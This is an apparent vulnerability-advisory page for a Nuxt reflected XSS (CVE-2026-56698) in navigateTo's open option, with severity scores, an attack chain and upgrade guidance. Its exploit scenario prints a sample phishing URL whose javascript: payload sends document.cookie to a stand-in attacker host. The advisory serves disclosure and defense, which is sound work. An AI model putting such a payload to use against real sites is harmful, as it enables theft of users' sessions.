Skip to main content

Nuxt EUVDEUVD-2026-38379

| CVE-2026-56698 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-22 VulnCheck GHSA-h345-75vh-jjwf
5.3
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
5.3 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network-delivered reflected XSS requiring user interaction; scope change to browser origin; low C/I impact bounded to session context.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 22, 2026 - 22:24 vuln.today
Analysis Generated
Jun 22, 2026 - 22:24 vuln.today

DescriptionCVE.org

Nuxt versions 4.0.0 before 4.4.7 and 3.x before 3.21.7 fail to validate script-capable URLs in the navigateTo open option, allowing client-side script execution. Attackers can supply javascript: URLs through the open parameter to execute arbitrary scripts in the application's origin when user-controlled input is passed to navigateTo.

AnalysisAI

Reflected XSS in Nuxt 3.x before 3.21.7 and 4.x before 4.4.7 enables client-side script execution in the application's first-party origin when user-controlled input is passed to the navigateTo() composable's open parameter. The client-side early-open handler invoked window.open(toPath, ...) without running the isScriptProtocol check that guards the normal navigation path, allowing javascript:, data:, and vbscript: scheme URLs to reach window.open() directly. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify Nuxt app passing user input to navigateTo open option
Delivery
Craft javascript: URL as redirect target
Exploit
Deliver malicious link to victim via phishing or open redirect
Execution
Victim clicks link triggering navigateTo with open option
Persist
window.open() executes javascript: payload in app origin
Impact
Exfiltrate session data or perform authenticated actions

Vulnerability AssessmentAI

Exploitation Exploitation requires that the target Nuxt application passes user-controlled input as the URL argument to `navigateTo()` with an `open` option (e.g., `navigateTo(userInput, { open: { target: '_blank' } })`). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N, score 5.3 Medium) accurately reflects the attack characteristics: network-reachable, low complexity, no attacker authentication required, but passive user interaction (UI:P) is a hard prerequisite - the victim must click or be redirected to a crafted URL. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a Nuxt application that accepts a user-supplied URL parameter (e.g., `?next=`) and passes it directly to `navigateTo(url, { open: { target: '_blank' } })`. The attacker crafts a link such as `https://app.example.com/login?next=javascript:fetch('https://attacker.com/?c='+document.cookie)` and distributes it via phishing. …
Remediation Upgrade to Nuxt 4.4.7 (for 4.x users) or Nuxt 3.21.7 (for 3.x users); these are the vendor-confirmed fixed versions per GHSA-c9cv-mq2m-ppp3. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Nuxt

View all
CVE-2023-3224 CRITICAL POC
9.8 Jun 13

Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3. Rated critical severity (CVSS 9.8), this vulnerability is

CVE-2024-34344 HIGH POC
8.8 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve

CVE-2024-23657 HIGH POC
8.8 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve

CVE-2024-42352 HIGH POC
7.5 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve

CVE-2024-34343 MEDIUM POC
6.1 Aug 05

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated medium se

CVE-2023-0878 MEDIUM POC
6.1 Feb 17

Cross-site Scripting (XSS) - Generic in GitHub repository nuxt/framework prior to 3.2.1. Rated medium severity (CVSS 6.1

CVE-2023-2138 CRITICAL
9.8 Apr 18

Use of Hard-coded Credentials in GitHub repository nuxtlabs/github-module prior to 1.6.2. Rated critical severity (CVSS

CVE-2026-41248 CRITICAL
9.1 Apr 24

Clerk JavaScript is the official JavaScript repository for Clerk authentication. createRouteMatcher in @clerk/nextjs, @c

CVE-2026-53721 HIGH
8.8 Jun 12

Route-rule middleware bypass in Nuxt 3.11.0-3.21.6 and 4.0.0-4.4.6 allows remote attackers to evade routeRules-defined p

CVE-2025-27415 HIGH
7.5 Mar 19

Nuxt is an open-source web development framework for Vue.js. Rated high severity (CVSS 7.5), this vulnerability is remot

CVE-2025-59414 LOW POC
3.1 Sep 17

Nuxt is an open-source web development framework for Vue.js. Rated low severity (CVSS 3.1), this vulnerability is remote

CVE-2026-56301 MEDIUM
6.8 Jun 23

Nuxt's development server on Linux exposes an unprotected vite-node IPC server via a Linux abstract-namespace Unix socke

Share

EUVD-2026-38379 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy